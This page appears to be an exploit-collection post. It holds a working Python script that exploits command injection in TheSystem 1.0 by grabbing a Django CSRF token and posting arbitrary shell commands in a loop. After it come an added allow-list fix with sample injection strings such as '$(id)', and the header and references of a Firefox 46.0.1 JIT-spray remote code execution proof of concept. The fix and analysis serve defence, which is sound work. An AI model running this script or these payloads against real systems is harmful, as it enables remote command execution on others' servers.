TheSystem 1.0 – Command Injection Exploit

Written just for fun and practice: an exploit for "TheSystem 1.0 – Command Injection".

# Exploit Title: TheSystem 1.0 - Command Injection 
# Exploit author : chako
# Date: 2019-10-1
# Software Link: https://github.com/kostasmitroglou/thesystem
# Vuln Reported by: Sadik Cetin 
# Original Post: https://www.exploit-db.com/exploits/47441

#!/usr/bin/python
import requests

target = "http://127.0.0.1:8000/run_command/"

cmd = raw_input("Command># ") 
print cmd



while cmd != "exit" :
    client = requests.session()
    # Retrieve Django CSRF token
    csrfcookie = client.get(target).cookies['csrftoken']
    #print csrfcookie

    payload = {'command':cmd,'csrfmiddlewaretoken':csrfcookie}
    response = client.post(target, data=payload,headers=dict(Referer=target))

    if response.ok:
        print response.text
    else:
        print "error code --> ",response.status_code

    cmd = raw_input("Command># ") 
    print cmd
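
The PoC above obtains its CSRF token with a plain GET and then posts arbitrary text in the `command` field, so the token is not an access control and the fix has to be in how the server treats that field. The following is an added example, not code from TheSystem or from the exploit author: a handler for the `command` value that accepts only operation names from a fixed allow-list and runs them without a shell. The names `ALLOWED`, `CommandRejected` and `run_command_field` and the listed operations are assumptions, since the page does not show the server-side code.

```python
import subprocess
import sys

# Assumed allow-list: operation name -> fixed argv. Request data only selects
# an entry; it never becomes part of the command line.
ALLOWED = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
    "pyver": [sys.executable, "--version"],
}


class CommandRejected(ValueError):
    """Raised when the 'command' field is not an allow-listed operation."""


def run_command_field(value, allowed=ALLOWED, timeout=5):
    """Treat the POSTed 'command' value as an operation name, not shell text.

    Returns (exit_code, output). Raises CommandRejected for anything else,
    which the view should turn into HTTP 400 and log.
    """
    name = value.strip() if isinstance(value, str) else ""
    argv = allowed.get(name)
    if argv is None:
        raise CommandRejected("operation not allowed: %r" % name[:40])
    # shell=False with a list argv: no shell ever parses metacharacters.
    proc = subprocess.run(
        argv, shell=False, capture_output=True, text=True,
        timeout=timeout, check=False,
    )
    return proc.returncode, proc.stdout + proc.stderr


def demo():
    """Run constructed sample inputs; returns {input: 'ok' | 'rejected'}."""
    samples = ["pyver", "pyver; id", "$(id)", "", None]  # constructed inputs
    results = {}
    for s in samples:
        try:
            run_command_field(s)
            results[s] = "ok"
        except CommandRejected:
            results[s] = "rejected"
    return results


if __name__ == "__main__":
    for sample, verdict in demo().items():
        print(repr(sample), "->", verdict)
```

In the Django view, call it with `request.POST.get("command")` behind an authentication check and return HTTP 400 on `CommandRejected`.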

Demo Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution

<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successful exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 
-->

References:
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs